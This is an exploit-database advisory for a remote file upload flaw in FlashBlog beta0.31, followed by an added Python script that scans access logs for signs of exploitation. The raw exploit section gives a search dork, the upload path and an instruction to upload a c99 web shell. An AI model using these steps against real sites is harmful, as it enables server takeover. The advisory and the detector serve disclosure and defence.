vendor: FlashBlog
by: ilker kandemir a.k.a MEFISTO
CVSS: 9.3 HIGH
Remote File Upload
CWE: N/A
Product Name: FlashBlog
Affected Version From: FlashBlog beta0.31
Affected Version To: FlashBlog beta0.31
Patch Exists: YES
Related CWE: N/A
CPE: a:flashblog:flashblog
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

FlashBlog beta0.31 Remote File Upload Vulnerability

FlashBlog beta0.31 contains a remote file upload vulnerability. An attacker can upload a malicious file to the server and then use it to execute arbitrary code on that server.

Mitigation:

Upgrade to the latest version of FlashBlog.

Exploit-DB raw data:

FlashBlog beta0.31 Remote File Upload Vulnerability

# Author : ilker kandemir a.k.a MEFISTO  

# Dork : inurl:flashblog.html  or  inurl:/flashblog/

# Website : www.dumenci.net, www.coderx.org

http://[site.com]/admin/Editor/imgupload.php ==>>> upload your c99 shell

http://[site.com]/tus_imagenes/c99.php ==>>> your address

Tnx: Dumenci, Damar, Cr@zy_king, Str0ke and all my friendz

# milw0rm.com [2008-06-03]
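
For defenders, the two paths named in the advisory translate directly into an access-log check. The following is an added example, not part of the original advisory or of FlashBlog: it scans combined-format web server logs for POSTs to the upload script and for script files requested from the image directory. The sample log lines, the `/flashblog/` install prefix and the file names are constructed.

```python
import re
from urllib.parse import unquote, urlsplit

# Paths taken from the advisory; the install prefix in front of them varies per site.
UPLOAD_RE = re.compile(r"/admin/Editor/imgupload\.php$", re.I)
# Files in the image directory that a PHP-enabled server may execute (incl. x.php.jpg).
SCRIPT_RE = re.compile(r"/tus_imagenes/[^/]*\.(?:php\d?|phtml|phar)(?:\.[^/]*)?$", re.I)
# Apache/nginx "combined" format: ip ident user [time] "METHOD target PROTO" status ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Constructed sample input (documentation IP ranges, made-up file names).
SAMPLE = [
    '198.51.100.7 - - [03/Jun/2008:10:00:01 +0000] "GET /flashblog/flashblog.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [03/Jun/2008:10:00:09 +0000] "POST /flashblog/admin/Editor/imgupload.php HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [03/Jun/2008:10:00:11 +0000] "GET /flashblog/tus_imagenes/holiday.jpg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [03/Jun/2008:10:00:15 +0000] "GET /flashblog/tus_imagenes/img01.php?x=1 HTTP/1.1" 200 901 "-" "Mozilla/5.0"',
]

def scan(lines):
    """Return findings as (kind, client, time, path, status) tuples, in log order."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        client, when, method, target, status = m.groups()
        path = unquote(urlsplit(target).path)  # drop query string, decode %xx
        if method == "POST" and UPLOAD_RE.search(path):
            findings.append(("upload", client, when, path, int(status)))
        elif SCRIPT_RE.search(path):
            findings.append(("script-in-image-dir", client, when, path, int(status)))
    return findings

def likely_compromise(findings):
    """Script requests answered 200 after an accepted upload POST: treat as an incident."""
    seen_upload = False
    hits = []
    for kind, client, _when, path, status in findings:
        if kind == "upload" and status < 400:
            seen_upload = True
        elif kind == "script-in-image-dir" and status == 200 and seen_upload:
            hits.append((client, path))
    return hits

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
    print("likely compromise:", likely_compromise(scan(SAMPLE)))
```

A script request that returns 404 is still reported by `scan`, since it shows someone probing the image directory, but only a 200 after an accepted upload is escalated by `likely_compromise`.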